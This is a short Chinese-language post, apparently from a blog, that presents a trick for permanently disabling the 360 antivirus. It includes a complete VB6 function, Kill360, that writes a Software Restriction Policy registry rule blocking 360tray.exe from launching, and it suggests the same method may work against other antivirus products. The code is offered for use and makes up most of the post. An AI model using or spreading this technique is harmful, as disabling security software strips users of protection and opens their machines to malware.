今天无意中发现一个漏洞,可以轻松干掉360,就是利用Windows的启动机制实现拦截360的运行。Windows中有一个叫做软件限制策略的功能,可以用来限制应用程序的运行,和IFEO比较像,只不过IFEO早已过时,而且被360彻底封杀掉了,而windows的进程启动限制机制360倒没有注意到。于是,直接写一个限制360启动的规则加入注册表,这样360就再也无法启动了,这下360终于不牛B了吧,哈哈!此漏洞在360安全卫士9.1+WindowsXP/SP3下测试成功。同样地,此漏洞或许也适用于其它杀毒软件,不过有待测试。
1 Option Explicit 2 Private Declare Function RegCreateKey Lib "advapi32.dll" Alias "RegCreateKeyA" (ByVal hKey As Long, ByVal lpSubKey As String, phkResult As Long) As Long 3 Private Declare Function RegCloseKey Lib "advapi32.dll" (ByVal hKey As Long) As Long 4 Private Declare Function RegSetValueEx Lib "advapi32.dll" Alias "RegSetValueExA" (ByVal hKey As Long, ByVal lpValueName As String, ByVal Reserved As Long, ByVal dwType As Long, lpData As Any, ByVal cbData As Long) As Long 5 Private Declare Function lstrlen Lib "kernel32" Alias "lstrlenA" (ByVal lpString As String) As Long 6 7 Private Const HKEY_LOCAL_MACHINE = &H80000002 8 9 Private Const REG_SZ = 1 10 Private Const REG_QWORD = 11 11 Private Const REG_DWORD = 4 12 13 '永久封锁掉360禁止它再启动 14 Public Function Kill360() As Boolean 15 Dim hKey As Long 16 Dim lRet As Long 17 Dim strFileName As String 18 Dim bytData(0 To 7) As Byte 19 strFileName = "360tray.exe" '360的文件名,这里以路径规则举例 20 lRet = RegCreateKey(HKEY_LOCAL_MACHINE, "SOFTWARE\Policies\Microsoft\Windows\Safer\CodeIdentifiers\0\Paths\{487462c2-2064-4e1f-aeae-20b7095a41bb}", hKey) 21 If lRet = 0 Then 22 lRet = RegSetValueEx(hKey, "Description", 0&, REG_SZ, ByVal vbNullString, 0) 23 lRet = RegSetValueEx(hKey, "ItemData", 0&, REG_SZ, ByVal strFileName, lstrlen(strFileName)) 24 lRet = RegSetValueEx(hKey, "LastModified", 0&, REG_QWORD, bytData(0), 8) 25 lRet = RegSetValueEx(hKey, "SaferFlags", 0&, REG_DWORD, 0, 4) 26 RegCloseKey hKey 27 Kill360 = (lRet = 0) 28 End If 29 End Function